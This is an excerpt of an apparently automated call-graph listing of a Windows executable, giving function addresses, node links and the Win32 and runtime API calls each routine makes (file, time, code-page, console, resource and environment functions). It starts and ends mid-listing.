139 API calls __EH_prolog3 25515->25808 25809 6253f0 25516->25809 25519 61a3db 25517->25519 25526 61a3a3 25517->25526 25519->25536 25804 6188a9 113 API calls 25519->25804 25521->25513 25522 61a2f4 25521->25522 25796 61b1e6 25521->25796 25522->25513 25802 61b427 82 API calls 25522->25802 25523 61a550 25821 625099 139 API calls 25523->25821 25530 61a466 25524->25530 25803 61240a 74 API calls CatchGuardHandler 25526->25803 25805 619582 38 API calls 25530->25805 25533 61a502 25533->25387 25535 61a47e 25535->25536 25537 61a494 25535->25537 25538 61a4ab 25535->25538 25536->25533 25541 61a5c5 25536->25541 25822 61c905 5 API calls CatchGuardHandler 25536->25822 25806 6185fc 86 API calls 25537->25806 25807 61a8b9 103 API calls CatchGuardHandler 25538->25807 25543 61a656 25541->25543 25823 61240a 74 API calls CatchGuardHandler 25541->25823 25543->25484 25544 61a764 25543->25544 25546 61a712 25543->25546 25770 61b949 SetEndOfFile 25543->25770 25544->25484 25545 61c2e5 8 API calls 25544->25545 25547 61a7bf 25545->25547 25771 61b7e2 25546->25771 25547->25484 25824 61240a 74 API calls CatchGuardHandler 25547->25824 25550 61a759 25551 61afd0 77 API calls 25550->25551 25551->25544 25553 61a7cf 25825 617d49 76 API calls CatchGuardHandler 25553->25825 25556 61b999 25555->25556 25557 61b9a3 25556->25557 25850 617c87 78 API calls 25556->25850 25557->25374 25560 6116ca 25559->25560 25562 6116dc Concurrency::cancel_current_task 25559->25562 25560->25562 25851 611729 26 API calls 25560->25851 25563 612179 26 API calls 25562->25563 25564 61170b 25563->25564 25852 61eea4 86 API calls Concurrency::cancel_current_task 25564->25852 25568 61669b __EH_prolog3 25567->25568 25583 61d467 GetCurrentProcess GetProcessAffinityMask 25568->25583 25570 6166a5 25584 6211a5 25570->25584 25572 6166fc 25588 6168b3 GetCurrentProcess GetProcessAffinityMask 25572->25588 25574 616719 25574->25407 25576 61cc65 _abort 25575->25576 25590 61cb21 25576->25590 25581 6310f9 CatchGuardHandler 5 API calls 25582 61cc95 25581->25582 25582->25409 25583->25570 25585 6211b1 __EH_prolog3 25584->25585 25589 614a2c 41 API calls 25585->25589 25587 6211ca 25587->25572 25588->25574 25589->25587 25597 61cb02 25590->25597 25592 61cb96 25593 612179 25592->25593 25594 612193 25593->25594 25595 612184 25593->25595 25594->25581 25601 6113db 26 API calls Concurrency::cancel_current_task 25595->25601 25598 61cb10 25597->25598 25599 61cb0b 25597->25599 25598->25592 25600 612179 26 API calls 25599->25600 25600->25598 25601->25594 25616 6118b2 25602->25616 25605 61b8c0 25606 61b8d2 25605->25606 25607 61b8e5 25605->25607 25608 61b8f0 25606->25608 25629 617cd8 77 API calls 25606->25629 25607->25608 25610 61b8f8 SetFilePointer 25607->25610 25608->25423 25610->25608 25611 61b914 GetLastError 25610->25611 25611->25608 25612 61b91e 25611->25612 25612->25608 25630 617cd8 77 API calls 25612->25630 25614->25426 25615->25422 25617 611476 25616->25617 25618 6118c4 25616->25618 25617->25605 25619 6118ed 25618->25619 25626 617bad 76 API calls 2 library calls 25618->25626 25620 6366ae 22 API calls 25619->25620 25622 61190a 25620->25622 25622->25617 25628 617c32 75 API calls 25622->25628 25623 6118e3 25627 617c32 75 API calls 25623->25627 25626->25623 25627->25619 25628->25617 25629->25607 25630->25608 25632 6302ac 25631->25632 25633 620597 53 API calls 25632->25633 25634 6302da 25633->25634 25635 614c00 _swprintf 51 API calls 25634->25635 25636 6302ec 25635->25636 25637 62f7fc 21 API calls 25636->25637 25638 6302fd 25637->25638 25639 6310f9 CatchGuardHandler 5 API calls 25638->25639 25640 623d08 25639->25640 25640->25387 25642 612fdd 25641->25642 25653 6130b2 25642->25653 25728 614793 99 API calls 25642->25728 25646 613073 25729 614987 79 API calls 25646->25729 25648 613054 25648->25646 25730 616cbc 97 API calls CatchGuardHandler 25648->25730 25649 6310f9 CatchGuardHandler 5 API calls 25652 613aa9 25649->25652 25650 6130c9 25654 613124 25650->25654 25656 613130 25650->25656 25652->25443 25689 61ed2c 25653->25689 25731 6125f4 74 API calls 25654->25731 25657 61ed2c 78 API calls 25656->25657 25658 61319b 25657->25658 25659 6131d9 25658->25659 25660 6138eb 25658->25660 25665 6131eb 25659->25665 25697 61cbab 25659->25697 25661 61cc45 26 API calls 25660->25661 25661->25665 25663 61307a 25663->25649 25665->25663 25740 61240a 74 API calls CatchGuardHandler 25665->25740 25666 6132c6 25667 613ab1 25666->25667 25668 613586 25666->25668 25741 6313f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25667->25741 25669 613615 25668->25669 25678 6135a9 _strlen 25668->25678 25733 623d10 MultiByteToWideChar 25669->25733 25672 613ab6 25673 613608 25732 6126b5 7 API calls 25673->25732 25674 613624 25682 613610 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 25674->25682 25734 6125da 25674->25734 25678->25673 25700 622345 25678->25700 25680 613869 25680->25665 25739 61240a 74 API calls CatchGuardHandler 25680->25739 25708 623527 12 API calls 25682->25708 25686 61377a 25686->25680 25709 6232f8 25686->25709 25719 623583 SystemTimeToFileTime 25686->25719 25738 623527 12 API calls 25686->25738 25687->25443 25688->25440 25690 61eda9 25689->25690 25691 61ed3a 25689->25691 25692 6118b2 78 API calls 25690->25692 25696 6130c3 25690->25696 25693 6118b2 78 API calls 25691->25693 25691->25696 25692->25696 25694 61ed63 25693->25694 25742 616c92 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25694->25742 25696->25646 25696->25650 25698 6125da 78 API calls 25697->25698 25699 61cbbe 25698->25699 25699->25666 25701 622351 __EH_prolog3 25700->25701 25702 6223a1 25701->25702 25703 6125da 78 API calls 25701->25703 25707 622357 25701->25707 25744 623d10 MultiByteToWideChar 25702->25744 25704 622392 25703->25704 25743 62248f OemToCharBuffA _strlen 25704->25743 25707->25673 25708->25686 25710 623322 __aulldiv 25709->25710 25745 61d076 25710->25745 25713 623336 FileTimeToLocalFileTime 25715 6233b3 FileTimeToSystemTime 25713->25715 25714 623348 FileTimeToSystemTime SystemTimeToTzSpecificLocalTime SystemTimeToFileTime SystemTimeToFileTime 25714->25715 25716 62340c __aullrem 25715->25716 25717 6310f9 CatchGuardHandler 5 API calls 25716->25717 25718 62347a 25717->25718 25718->25686 25720 6235f4 25719->25720 25722 62367f 25719->25722 25721 61d076 6 API calls 25720->25721 25723 6235f9 25721->25723 25724 6310f9 CatchGuardHandler 5 API calls 25722->25724 25725 623600 LocalFileTimeToFileTime 25723->25725 25726 62361a FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 25723->25726 25727 6236b8 25724->25727 25725->25722 25726->25722 25727->25686 25728->25648 25729->25663 25730->25653 25731->25663 25732->25682 25733->25674 25735 6125e3 25734->25735 25736 6125ec 25734->25736 25737 6118b2 78 API calls 25735->25737 25736->25682 25737->25736 25738->25686 25739->25665 25740->25663 25741->25672 25742->25696 25743->25702 25744->25707 25746 61d09c GetVersionExW 25745->25746 25747 61d0c9 25745->25747 25746->25747 25748 6310f9 CatchGuardHandler 5 API calls 25747->25748 25749 61d0f2 25748->25749 25749->25713 25749->25714 25751 616946 25750->25751 25828 616852 25751->25828 25753 616979 25755 6169b1 25753->25755 25833 61d122 6 API calls 3 library calls 25753->25833 25755->25459 25759 61d644 25756->25759 25757 6310f9 CatchGuardHandler 5 API calls 25758 61d7d8 25757->25758 25758->25463 25759->25757 25761 618f99 25760->25761 25762 618fd1 25761->25762 25844 617e25 74 API calls 25761->25844 25762->25469 25762->25472 25762->25476 25764 618fc9 25845 611407 74 API calls CatchGuardHandler 25764->25845 25767 61c95b 25766->25767 25769 61c965 25766->25769 25768 63121c 27 API calls 25767->25768 25768->25769 25769->25501 25770->25546 25772 61b7f3 25771->25772 25775 61b802 25771->25775 25773 61b7f9 FlushFileBuffers 25772->25773 25772->25775 25773->25775 25774 61b87f SetFileTime 25774->25550 25775->25774 25776->25451 25777->25468 25778->25461 25779->25465 25780->25495 25781->25495 25782->25495 25783->25495 25784->25495 25785->25504 25786->25481 25787->25490 25788->25504 25789->25486 25790->25490 25792 61b291 GetFileType 25791->25792 25793 61a1ba 25791->25793 25792->25793 25793->25510 25794 61240a 74 API calls CatchGuardHandler 25793->25794 25794->25508 25795->25510 25797 61b1ff 25796->25797 25800 61b8c0 79 API calls 25797->25800 25798 61b203 25801 61b8c0 79 API calls 25798->25801 25799 61b231 25799->25522 25800->25798 25801->25799 25802->25513 25803->25536 25804->25536 25805->25535 25806->25536 25807->25536 25808->25536 25810 625405 25809->25810 25812 62540f ___std_exception_copy 25809->25812 25846 617c32 75 API calls 25810->25846 25813 625495 25812->25813 25814 62553f 25812->25814 25817 6254b9 _abort 25812->25817 25847 625323 134 API calls 3 library calls 25813->25847 25848 6347d0 RaiseException 25814->25848 25817->25523 25819 62556b 25820 62559d 25819->25820 25849 62517f 134 API calls 25819->25849 25820->25523 25821->25536 25822->25541 25823->25543 25824->25553 25825->25484 25826->25469 25827->25469 25834 616731 25828->25834 25831 616731 6 API calls 25832 616873 25831->25832 25832->25753 25833->25753 25835 61673b 25834->25835 25836 61d63a 5 API calls 25835->25836 25837 616765 25836->25837 25840 61d63a 5 API calls 25837->25840 25842 616833 25837->25842 25843 61d122 6 API calls 3 library calls 25837->25843 25838 6310f9 CatchGuardHandler 5 API calls 25839 616845 25838->25839 25839->25831 25839->25832 25840->25837 25842->25838 25843->25837 25844->25764 25845->25762 25846->25812 25847->25817 25848->25819 25849->25819 25850->25557 25854 61c4b2 25853->25854 25855 61c4e5 FindFirstFileW 25854->25855 25856 61c548 FindNextFileW 25854->25856 25858 61c4f2 25855->25858 25865 61c52d 25855->25865 25857 61c553 GetLastError 25856->25857 25856->25865 25857->25865 25859 61da1e 6 API calls 25858->25859 25860 61c505 25859->25860 25861 61c522 GetLastError 25860->25861 25862 61c509 FindFirstFileW 25860->25862 25861->25865 25862->25861 25862->25865 25863 6310f9 CatchGuardHandler 5 API calls 25864 61c39f 25863->25864 25864->25395 25864->25398 25865->25863 25867 61ab31 25866->25867 25869 61ab64 _abort 25866->25869 25868 61bc65 8 API calls 25867->25868 25867->25869 25868->25867 25869->25320 25871 6243a0 25870->25871 25872 6243b9 25871->25872 25875 6243cd 25871->25875 25877 622fc9 86 API calls 25872->25877 25874 6243c0 Concurrency::cancel_current_task 25874->25875 25877->25874 25886 62c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25878->25886 25880 62c55d 25882 62c569 25880->25882 25887 62c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25880->25887 25882->25013 25882->25014 25883->25024 25884->25024 25885->25027 25886->25880 25887->25882 25889 61b982 78 API calls 25888->25889 25890 6120f7 25889->25890 25891 612114 25890->25891 25892 611b63 118 API calls 25890->25892 25891->25043 25891->25044 25893 612104 25892->25893 25893->25891 25899 611407 74 API calls CatchGuardHandler 25893->25899 25896 611b1a 25895->25896 25897 611b1e 25895->25897 25896->25049 25900 611a55 25897->25900 25899->25891 25901 611a67 25900->25901 25902 611aa4 25900->25902 25903 61441e 118 API calls 25901->25903 25908 6148bd 25902->25908 25904 611a87 25903->25904 25904->25896 25912 6148c6 25908->25912 25909 61441e 118 API calls 25909->25912 25910 611ac5 25910->25904 25913 611fb0 25910->25913 25912->25909 25912->25910 25925 622ee4 25912->25925 25914 611fbc __EH_prolog3 25913->25914 25933 6144ab 25914->25933 25917 6118b2 78 API calls 25918 611ff0 25917->25918 25965 61199b 78 API calls 25918->25965 25920 612060 25920->25904 25921 612008 25923 612014 _wcslen 25921->25923 25966 623d10 MultiByteToWideChar 25921->25966 25967 61199b 78 API calls 25923->25967 25926 622eeb 25925->25926 25927 622f06 25926->25927 25931 617ba8 RaiseException Concurrency::cancel_current_task 25926->25931 25929 622f17 SetThreadExecutionState 25927->25929 25932 617ba8 RaiseException Concurrency::cancel_current_task 25927->25932 25929->25912 25931->25927 25932->25929 25934 6144c6 25933->25934 25935 614510 25934->25935 25936 6144f4 25934->25936 25937 61476a 25935->25937 25942 61453c 25935->25942 25968 611407 74 API calls CatchGuardHandler 25936->25968 25975 611407 74 API calls CatchGuardHandler 25937->25975 25940 6144ff 25941 6310f9 CatchGuardHandler 5 API calls 25940->25941 25943 611fdf 25941->25943 25942->25940 25944 6253f0 134 API calls 25942->25944 25943->25917 25943->25920 25950 614589 25944->25950 25945 6145bb 25946 614646 25945->25946 25964 6145b2 25945->25964 25970 61f014 97 API calls 25945->25970 25948 61c94d 27 API calls 25946->25948 25947 6145b7 25947->25945 25952 6125da 78 API calls 25947->25952 25954 614659 25948->25954 25949 6145a7 25969 611407 74 API calls CatchGuardHandler 25949->25969 25950->25945 25950->25947 25950->25949 25951 624396 86 API calls 25951->25940 25952->25945 25956 6146f2 25954->25956 25957 6146e2 25954->25957 25972 625099 139 API calls 25956->25972 25971 61ab81 139 API calls __EH_prolog3 25957->25971 25960 6146f0 25973 61c905 5 API calls CatchGuardHandler 25960->25973 25962 61472a 25962->25964 25974 61240a 74 API calls CatchGuardHandler 25962->25974 25964->25951 25965->25921 25966->25923 25967->25920 25968->25940 25969->25964 25970->25946 25971->25960 25972->25960 25973->25962 25974->25964 25975->25940 25976->25070 25977 63d240 25978 63d24b 25977->25978 25980 63d274 25978->25980 25982 63d270 25978->25982 25983 63d55a 25978->25983 25990 63d2a0 DeleteCriticalSection 25980->25990 25991 63d2e8 25983->25991 25986 63d59f InitializeCriticalSectionAndSpinCount 25987 63d58a 25986->25987 25988 6310f9 CatchGuardHandler 5 API calls 25987->25988 25989 63d5b6 25988->25989 25989->25978 25990->25982 25992 63d318 25991->25992 25995 63d314 25991->25995 25992->25986 25992->25987 25993 63d338 25993->25992 25996 63d344 GetProcAddress 25993->25996 25995->25992 25995->25993 25998 63d384 25995->25998 25997 63d354 _abort 25996->25997 25997->25992 25999 63d3a5 LoadLibraryExW 25998->25999 26004 63d39a 25998->26004 26000 63d3c2 GetLastError 25999->26000 26001 63d3da 25999->26001 26000->26001 26002 63d3cd LoadLibraryExW 26000->26002 26003 63d3f1 FreeLibrary 26001->26003 26001->26004 26002->26001 26003->26004 26004->25995 26005 63e180 26006 63e192 26005->26006 26007 63e189 26005->26007 26009 63e077 26007->26009 26010 63b9a5 _abort 38 API calls 26009->26010 26011 63e084 26010->26011 26029 63e19e 26011->26029 26013 63e08c 26038 63de0b 26013->26038 26016 63e0a3 26016->26006 26017 63bc8e __vswprintf_c_l 21 API calls 26018 63e0b4 26017->26018 26019 63e0e6 26018->26019 26045 63e240 26018->26045 26022 63bafa _free 20 API calls 26019->26022 26022->26016 26023 63e0e1 26055 63bc7b 20 API calls _abort 26023->26055 26025 63e12a 26025->26019 26056 63dce1 26 API calls 26025->26056 26026 63e0fe 26026->26025 26027 63bafa _free 20 API calls 26026->26027 26027->26025 26030 63e1aa __FrameHandler3::FrameUnwindToState 26029->26030 26031 63b9a5 _abort 38 API calls 26030->26031 26036 63e1b4 26031->26036 26033 63e238 _abort 26033->26013 26036->26033 26037 63bafa _free 20 API calls 26036->26037 26057 63b584 38 API calls _abort 26036->26057 26058 63d281 EnterCriticalSection 26036->26058 26059 63e22f LeaveCriticalSection _abort 26036->26059 26037->26036 26039 636dd4 __fassign 38 API calls 26038->26039 26040 63de1d 26039->26040 26041 63de3e 26040->26041 26042 63de2c GetOEMCP 26040->26042 26043 63de43 GetACP 26041->26043 26044 63de55 26041->26044 26042->26044 26043->26044 26044->26016 26044->26017 26046 63de0b 40 API calls 26045->26046 26047 63e25f 26046->26047 26050 63e2b0 IsValidCodePage 26047->26050 26052 63e266 26047->26052 26054 63e2d5 _abort 26047->26054 26048 6310f9 CatchGuardHandler 5 API calls 26049 63e0d9 26048->26049 26049->26023 26049->26026 26051 63e2c2 GetCPInfo 26050->26051 26050->26052 26051->26052 26051->26054 26052->26048 26060 63dee3 GetCPInfo 26054->26060 26055->26019 26056->26019 26058->26036 26059->26036 26066 63df1d 26060->26066 26069 63dfc7 26060->26069 26063 6310f9 CatchGuardHandler 5 API calls 26065 63e073 26063->26065 26065->26052 26070 63efd8 26066->26070 26068 63d1c8 __vswprintf_c_l 43 API calls 26068->26069 26069->26063 26071 636dd4 __fassign 38 API calls 26070->26071 26072 63eff8 MultiByteToWideChar 26071->26072 26074 63f036 26072->26074 26080 63f0ce 26072->26080 26076 63bc8e __vswprintf_c_l 21 API calls 26074->26076 26081 63f057 _abort __vsnwprintf_l 26074->26081 26075 6310f9 CatchGuardHandler 5 API calls 26077 63df7e 26075->26077 26076->26081 26084 63d1c8 26077->26084 26078 63f0c8 26089 63d213 20 API calls _free 26078->26089 26080->26075 26081->26078 26082 63f09c MultiByteToWideChar 26081->26082 26082->26078 26083 63f0b8 GetStringTypeW 26082->26083 26083->26078 26085 636dd4 __fassign 38 API calls 26084->26085 26086 63d1db 26085->26086 26090 63cfab 26086->26090 26089->26080 26091 63cfc6 __vswprintf_c_l 26090->26091 26092 63cfec MultiByteToWideChar 26091->26092 26093 63d1a0 26092->26093 26094 63d016 26092->26094 26095 6310f9 CatchGuardHandler 5 API calls 26093->26095 26099 63bc8e __vswprintf_c_l 21 API calls 26094->26099 26101 63d037 __vsnwprintf_l 26094->26101 26096 63d1b3 26095->26096 26096->26068 26097 63d080 MultiByteToWideChar 26098 63d0ec 26097->26098 26100 63d099 26097->26100 26126 63d213 20 API calls _free 26098->26126 26099->26101 26117 63d5bc 26100->26117 26101->26097 26101->26098 26105 63d0c3 26105->26098 26108 63d5bc __vswprintf_c_l 11 API calls 26105->26108 26106 63d0fb 26107 63bc8e __vswprintf_c_l 21 API calls 26106->26107 26111 63d11c __vsnwprintf_l 26106->26111 26107->26111 26108->26098 26109 63d191 26125 63d213 20 API calls _free 26109->26125 26111->26109 26112 63d5bc __vswprintf_c_l 11 API calls 26111->26112 26113 63d170 26112->26113 26113->26109 26114 63d17f WideCharToMultiByte 26113->26114 26114->26109 26115 63d1bf 26114->26115 26127 63d213 20 API calls _free 26115->26127 26118 63d2e8 _abort 5 API calls 26117->26118 26119 63d5e3 26118->26119 26122 63d5ec 26119->26122 26128 63d644 10 API calls 3 library calls 26119->26128 26121 63d62c LCMapStringW 26121->26122 26123 6310f9 CatchGuardHandler 5 API calls 26122->26123 26124 63d0b0 26123->26124 26124->26098 26124->26105 26124->26106 26125->26098 26126->26093 26127->26098 26128->26121 26129 6121a5 26130 6121b0 26129->26130 26131 6121b8 26129->26131 26135 6121ca 27 API calls Concurrency::cancel_current_task 26130->26135 26133 6121b6 26131->26133 26134 63121c 27 API calls 26131->26134 26134->26133 26135->26133 26139 63030b 26140 630318 26139->26140 26141 620597 53 API calls 26140->26141 26142 630333 26141->26142 26143 614c00 _swprintf 51 API calls 26142->26143 26144 630346 SetDlgItemTextW 26143->26144 26145 62d864 5 API calls 26144->26145 26146 630363 26145->26146 26147 6310f9 CatchGuardHandler 5 API calls 26146->26147 26148 630378 26147->26148 26149 6310a8 26150 6310b2 26149->26150 26151 630d3a ___delayLoadHelper2@8 14 API calls 26150->26151 26152 6310bf 26151->26152 26156 631bd2 26157 631bde __FrameHandler3::FrameUnwindToState 26156->26157 26188 63176c 26157->26188 26159 631be5 26160 631d38 26159->26160 26163 631c0f 26159->26163 26261 631fca IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 26160->26261 26162 631d3f 26262 63a7aa 28 API calls _abort 26162->26262 26176 631c4e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 26163->26176 26199 63b34d 26163->26199 26165 631d45 26263 63a75c 28 API calls _abort 26165->26263 26169 631d4d 26170 631c2e 26172 631caf 26207 6320e5 GetStartupInfoW _abort 26172->26207 26174 631cb5 26208 63b29e 51 API calls 26174->26208 26176->26172 26257 63a29c 38 API calls _abort 26176->26257 26177 631cbd 26209 63037c 26177->26209 26182 631cd1 26182->26162 26183 631cd5 26182->26183 26184 631cde 26183->26184 26259 63a74d 28 API calls _abort 26183->26259 26260 6318dd 12 API calls ___scrt_uninitialize_crt 26184->26260 26187 631ce6 26187->26170 26189 631775 26188->26189 26264 631de6 IsProcessorFeaturePresent 26189->26264 26191 631781 26265 63507e 26191->26265 26193 631786 26198 63178a 26193->26198 26273 63b1d7 26193->26273 26195 6317a1 26195->26159 26198->26159 26201 63b364 26199->26201 26200 6310f9 CatchGuardHandler 5 API calls 26202 631c28 26200->26202 26201->26200 26202->26170 26203 63b2f1 26202->26203 26204 63b320 26203->26204 26205 6310f9 CatchGuardHandler 5 API calls 26204->26205 26206 63b349 26205->26206 26206->26176 26207->26174 26208->26177 26364 62290a 26209->26364 26213 6303aa 26420 62ccd9 26213->26420 26215 6303b3 _abort 26216 6303c6 GetCommandLineW 26215->26216 26217 63046a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 26216->26217 26218 6303d9 26216->26218 26220 614c00 _swprintf 51 API calls 26217->26220 26424 62e872 26218->26424 26222 6304e6 SetEnvironmentVariableW GetModuleHandleW LoadIconW 26220->26222 26439 62d9dd LoadBitmapW 26222->26439 26223 6303e7 OpenFileMappingW 26227 63045b CloseHandle 26223->26227 26228 6303ff MapViewOfFile 26223->26228 26224 630464 26431 62ffdd 26224->26431 26227->26217 26230 630410 __InternalCxxFrameHandler 26228->26230 26231 630454 UnmapViewOfFile 26228->26231 26235 62ffdd 7 API calls 26230->26235 26231->26227 26237 63042c 26235->26237 26463 62136b 82 API calls 26237->26463 26238 62afe6 27 API calls 26239 630546 DialogBoxParamW 26238->26239 26244 630580 26239->26244 26241 630440 26464 621421 82 API calls _wcslen 26241->26464 26243 63044b 26243->26231 26245 630592 Sleep 26244->26245 26246 630599 26244->26246 26245->26246 26248 6305a7 26246->26248 26465 62cf89 7 API calls 3 library calls 26246->26465 26249 630613 26248->26249 26250 630625 26248->26250 26466 63004d WaitForSingleObject 26249->26466 26472 62cd3f GdiplusShutdown 26250->26472 26254 63065f 26255 6310f9 CatchGuardHandler 5 API calls 26254->26255 26256 630673 26255->26256 26258 63211b GetModuleHandleW 26256->26258 26257->26172 26258->26182 26259->26184 26260->26187 26261->26162 26262->26165 26263->26169 26264->26191 26277 636127 26265->26277 26269 63508f 26270 63509a 26269->26270 26291 636163 DeleteCriticalSection 26269->26291 26270->26193 26272 635087 26272->26193 26318 63e6aa 26273->26318 26276 63509d 7 API calls 2 library calls 26276->26198 26279 636130 26277->26279 26280 636159 26279->26280 26281 635083 26279->26281 26292 63636c 26279->26292 26297 636163 DeleteCriticalSection 26280->26297 26281->26272 26283 6351ac 26281->26283 26311 63627d 26283->26311 26286 6351c1 26286->26269 26288 6351cf 26289 6351dc 26288->26289 26317 6351df 6 API calls ___vcrt_FlsFree 26288->26317 26289->26269 26291->26272 26298 636192 26292->26298 26295 6363a4 InitializeCriticalSectionAndSpinCount 26296 63638f 26295->26296 26296->26279 26297->26281 26299 6361af 26298->26299 26303 6361b3 26298->26303 26299->26295 26299->26296 26300 63621b GetProcAddress 26300->26299 26302 636229 26300->26302 26302->26299 26303->26299 26303->26300 26304 63620c 26303->26304 26306 636232 LoadLibraryExW 26303->26306 26304->26300 26305 636214 FreeLibrary 26304->26305 26305->26300 26307 636279 26306->26307 26308 636249 GetLastError 26306->26308 26307->26303 26308->26307 26309 636254 ___vcrt_FlsGetValue 26308->26309 26309->26307 26310 63626a LoadLibraryExW 26309->26310 26310->26303 26312 636192 ___vcrt_FlsGetValue 5 API calls 26311->26312 26313 636297 26312->26313 26314 6362b0 TlsAlloc 26313->26314 26315 6351b6 26313->26315 26315->26286 26316 63632e 6 API calls ___vcrt_FlsGetValue 26315->26316 26316->26288 26317->26286 26321 63e6c7 26318->26321 26322 63e6c3 26318->26322 26319 6310f9 CatchGuardHandler 5 API calls 26320 631793 26319->26320 26320->26195 26320->26276 26321->26322 26324 63ccf0 26321->26324 26322->26319 26325 63ccfc __FrameHandler3::FrameUnwindToState 26324->26325 26336 63d281 EnterCriticalSection 26325->26336 26327 63cd03 26337 63eb78 26327->26337 26329 63cd12 26335 63cd21 26329->26335 26350 63cb79 29 API calls 26329->26350 26332 63cd1c 26351 63cc2f GetStdHandle GetFileType 26332->26351 26333 63cd32 _abort 26333->26321 26352 63cd3d LeaveCriticalSection _abort 26335->26352 26336->26327 26338 63eb84 __FrameHandler3::FrameUnwindToState 26337->26338 26339 63eb91 26338->26339 26340 63eba8 26338->26340 26361 63bc7b 20 API calls _abort 26339->26361 26353 63d281 EnterCriticalSection 26340->26353 26343 63eb96 26362 636649 26 API calls _abort 26343->26362 26345 63eba0 _abort 26345->26329 26346 63ebe0 26363 63ec07 LeaveCriticalSection _abort 26346->26363 26347 63ebb4 26347->26346 26354 63eac9 26347->26354 26350->26332 26351->26335 26352->26333 26353->26347 26355 63d786 _abort 20 API calls 26354->26355 26357 63eadb 26355->26357 26356 63eae8 26358 63bafa _free 20 API calls 26356->26358 26357->26356 26359 63d55a 11 API calls 26357->26359 26360 63eb3a 26358->26360 26359->26357 26360->26347 26361->26343 26362->26345 26363->26345 26365 631590 26364->26365 26366 622914 GetModuleHandleW 26365->26366 26367 622943 GetProcAddress 26366->26367 26368 622999 26366->26368 26369 622955 26367->26369 26370 62296d GetProcAddress 26367->26370 26371 622cda 26368->26371 26482 639e7e 42 API calls 2 library calls 26368->26482 26369->26370 26370->26368 26373 62297f 26370->26373 26374 622cdc GetModuleFileNameW 26371->26374 26373->26368 26390 622cfa 26374->26390 26375 622c06 26375->26374 26376 622c13 GetModuleFileNameW CreateFileW 26375->26376 26377 622c47 SetFilePointer 26376->26377 26378 622ccc CloseHandle 26376->26378 26377->26378 26379 622c55 ReadFile 26377->26379 26378->26374 26379->26378 26380 622c73 26379->26380 26382 622ede 26380->26382 26386 622c85 26380->26386 26381 61d076 6 API calls 26381->26390 26485 6313f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26382->26485 26384 622ee3 26386->26378 26389 6228ab 7 API calls 26386->26389 26387 622d5c GetFileAttributesW 26388 622d74 26387->26388 26387->26390 26391 622db4 26388->26391 26392 622d7f 26388->26392 26389->26386 26390->26381 26390->26387 26390->26388 26473 6228ab 26390->26473 26393 622ec3 26391->26393 26394 622dbc 26391->26394 26396 622d98 GetFileAttributesW 26392->26396 26398 622db0 26392->26398 26395 6310f9 CatchGuardHandler 5 API calls 26393->26395 26399 61d076 6 API calls 26394->26399 26397 622ed5 26395->26397 26396->26392 26396->26398 26419 62c5dd GetCurrentDirectoryW 26397->26419 26398->26391 26400 622dce 26399->26400 26401 622dd5 26400->26401 26402 622e3b 26400->26402 26403 6228ab 7 API calls 26401->26403 26404 614c00 _swprintf 51 API calls 26402->26404 26406 622ddf 26403->26406 26405 622e63 AllocConsole 26404->26405 26407 622e70 GetCurrentProcessId AttachConsole 26405->26407 26408 622ebb ExitProcess 26405->26408 26409 6228ab 7 API calls 26406->26409 26483 636433 26407->26483 26411 622de9 26409->26411 26413 620597 53 API calls 26411->26413 26412 622e91 GetStdHandle WriteConsoleW Sleep FreeConsole 26412->26408 26414 622e04 26413->26414 26415 614c00 _swprintf 51 API calls 26414->26415 26416 622e17 26415->26416 26417 620597 53 API calls 26416->26417 26418 622e26 26417->26418 26418->26408 26419->26213 26421 6228ab 7 API calls 26420->26421 26422 62cced OleInitialize 26421->26422 26423 62cd10 GdiplusStartup SHGetMalloc 26422->26423 26423->26215 26429 62e87c 26424->26429 26425 62e9a0 26426 6310f9 CatchGuardHandler 5 API calls 26425->26426 26427 62e9b1 26426->26427 26427->26223 26427->26224 26428 624159 CharUpperW 26428->26429 26429->26425 26429->26428 26486 621421 82 API calls _wcslen 26429->26486 26432 631590 26431->26432 26433 62ffea SetEnvironmentVariableW 26432->26433 26436 630016 26433->26436 26434 63003e 26435 6310f9 CatchGuardHandler 5 API calls 26434->26435 26437 630049 26435->26437 26436->26434 26438 630032 SetEnvironmentVariableW 26436->26438 26437->26217 26438->26434 26440 62da0b GetObjectW 26439->26440 26441 62d9fe 26439->26441 26443 62da1a 26440->26443 26487 62c652 FindResourceW 26441->26487 26445 62c556 4 API calls 26443->26445 26447 62da2d 26445->26447 26446 62da64 26455 61f93e 26446->26455 26447->26446 26448 62da3d 26447->26448 26450 62c652 12 API calls 26447->26450 26501 62c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26448->26501 26450->26448 26451 62da54 26502 62c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26451->26502 26453 62da5d 26503 62c79c 12 API calls CatchGuardHandler 26453->26503 26512 61f963 26455->26512 26460 62afe6 26461 63121c 27 API calls 26460->26461 26462 62b005 26461->26462 26462->26238 26463->26241 26464->26243 26465->26248 26467 630068 26466->26467 26468 6300ad CloseHandle 26466->26468 26469 63006b PeekMessageW 26467->26469 26468->26250 26470 63009e WaitForSingleObject 26469->26470 26471 63007d GetMessageW TranslateMessage DispatchMessageW 26469->26471 26470->26468 26470->26469 26471->26470 26472->26254 26474 631590 26473->26474 26475 6228b8 GetSystemDirectoryW 26474->26475 26476 6228fa 26475->26476 26477 6228de 26475->26477 26478 6310f9 CatchGuardHandler 5 API calls 26476->26478 26479 61dd18 5 API calls 26477->26479 26480 622906 26478->26480 26481 6228ed LoadLibraryW 26479->26481 26480->26390 26481->26476 26482->26375 26484 63643b 26483->26484 26484->26412 26484->26484 26485->26384 26486->26429 26488 62c675 SizeofResource 26487->26488 26489 62c763 26487->26489 26488->26489 26490 62c68c LoadResource 26488->26490 26489->26440 26489->26443 26490->26489 26491 62c6a1 LockResource 26490->26491 26491->26489 26492 62c6b2 GlobalAlloc 26491->26492 26492->26489 26493 